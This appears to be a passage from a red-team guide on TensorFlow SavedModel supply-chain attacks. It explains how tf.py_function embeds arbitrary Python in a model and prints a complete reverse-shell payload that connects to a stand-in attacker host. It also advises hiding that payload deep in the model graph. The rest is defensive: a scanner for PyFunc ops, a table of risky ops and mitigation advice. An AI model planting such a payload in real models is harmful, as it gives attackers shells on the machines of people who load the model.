Moving from PyTorch’s `pickle` vulnerabilities, you encounter a different landscape with TensorFlow’s SavedModel format. While it was designed to be more secure by separating the graph definition from arbitrary code execution, it is not immune to exploitation. The attack surface shifts from deserialization vulnerabilities to the abuse of legitimate, yet powerful, framework features designed for extensibility.
The SavedModel Structure: A Deceivingly Simple Façade
Unlike a single `.pth` file, a SavedModel is a directory containing a structured set of files. Understanding this structure is key to identifying where malicious code can be hidden. An attacker doesn’t corrupt a single file; they embed their payload within the model’s legitimate architecture.
saved_model.pb: This is the core. It’s a Protocol Buffer file defining the model’s computation graph, including all operations. This is where a malicious operation will be defined.variables/: This directory holds the trained parameters (weights and biases) of the model. While direct manipulation is possible for backdooring, it’s not the primary vector for code execution.assets/: For additional files, like vocabularies for text models. It can be abused for storing payloads but doesn’t execute them directly.
The Primary Exploit: Abusing `tf.py_function`
TensorFlow provides a powerful, and dangerous, operation called tf.py_function. Its legitimate purpose is to wrap Python logic within a TensorFlow graph, enabling custom data processing or integrating with libraries that don’t have native TensorFlow ops. For an attacker, it’s a direct gateway to arbitrary code execution on the victim’s machine.
When a model containing a tf.py_function is loaded and executed, the Python code within it runs with the same privileges as the process running the model. The victim believes they are just performing inference, but they are also executing your embedded payload.
Attack Crafting: Embedding a Reverse Shell
Here is how you would construct a simple, malicious layer using tf.py_function. This layer, when called, attempts to establish a reverse shell. It can be hidden within a larger, legitimate model architecture.
import tensorflow as tf
import os, socket, subprocess
# The malicious Python function
def reverse_shell_payload(x):
# This code executes on the victim's machine
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('ATTACKER_IP', 4444)) # Connect back to attacker
os.dup2(s.fileno(), 0) # stdin
os.dup2(s.fileno(), 1) # stdout
os.dup2(s.fileno(), 2) # stderr
subprocess.call(['/bin/sh', '-i'])
except:
pass # Fail silently if connection fails
return x # Pass the tensor through, appearing benign
# Wrap the payload in tf.py_function
@tf.function
def malicious_op(tensor_input):
# The second argument defines the output type
return tf.py_function(reverse_shell_payload, [tensor_input], tf.float32)
# Now, integrate this 'malicious_op' into a Keras model
# It could be an activation function or a custom layer.
# model.add(tf.keras.layers.Lambda(lambda x: malicious_op(x)))
# ...then save the model...
# model.save("poisoned_model")
The key is subtlety. An attacker wouldn’t place this in the first layer. It would be buried deep within the model, perhaps in a part of the graph that is only triggered by specific inputs, making detection during casual inspection more difficult.
Detection and Analysis for Red Teamers
As a red teamer, your goal is to find these hidden threats before they execute. Your analysis should focus on inspecting the model’s graph structure *before* running it.
Static Graph Inspection
You can programmatically load the model’s graph definition without executing any of its operations and check for the presence of dangerous ops. The operation created by tf.py_function is named PyFunc.
import tensorflow as tf
MODEL_PATH = "path/to/downloaded_model"
try:
# Load the model metadata and graph without initializing it
imported = tf.saved_model.load(MODEL_PATH)
# Get the concrete function for inference
# 'serving_default' is a common signature key
concrete_func = imported.signatures['serving_default']
found_pyfunc = False
# Iterate through all operations in the graph definition
for op in concrete_func.graph.get_operations():
if op.type == "PyFunc" or op.type == "EagerPyFunc":
print(f"[!] DANGEROUS OP DETECTED: {op.name} (Type: {op.type})")
found_pyfunc = True
if not found_pyfunc:
print("[+] No PyFunc operations found. Model appears safer.")
except Exception as e:
print(f"[-] Error loading or inspecting model: {e}")
This script acts as a basic scanner. A positive hit is a major red flag that requires manual investigation or outright rejection of the model.
Identifying Risky Operations
While PyFunc is the most direct vector, other operations can also introduce risk, especially those that load external modules or execute non-standard code.
| Operation Type | Associated Function | Risk Level | Description |
|---|---|---|---|
PyFunc / EagerPyFunc |
tf.py_function |
Critical | Executes arbitrary Python code. The primary vector for RCE. |
ReadFile |
tf.io.read_file |
Medium | Can be used for data exfiltration by reading sensitive local files and embedding their content into output tensors. |
| Custom C++ Ops | (Loaded via tf.load_op_library) |
High | Loads a shared object (`.so`) or DLL, which can contain any native code. Requires binary analysis of the associated library. |
tf.numpy_function |
tf.numpy_function |
Critical | Similar to `py_function`, but operates on NumPy arrays. Carries the same RCE risk. |
Mitigation and Defensive Posture
Advising a blue team on defense requires a multi-layered approach:
- Strict Vetting: Only use models from highly trusted, official sources. Avoid downloading models from unknown repositories or unverified user accounts.
- Automated Scanning: Integrate static analysis scripts, like the one shown above, into your MLOps pipeline. Any model entering the system should be automatically scanned for dangerous operations.
- Principle of Least Privilege: Run all model inference processes in sandboxed environments (e.g., containers like Docker or gVisor) with minimal permissions. Block all outbound network access unless explicitly required. This contains the blast radius of a successful execution.
- Disallow Custom Ops: Institute a policy that disallows models containing
PyFuncor custom C++ operations unless they have undergone a rigorous security review.
The TensorFlow SavedModel format is a significant step up in security from raw pickling, but its extensibility features create new, more subtle avenues for attack. Your role as a red teamer is to demonstrate that “safer” does not mean “safe,” and that diligent inspection of the model supply chain is non-negotiable.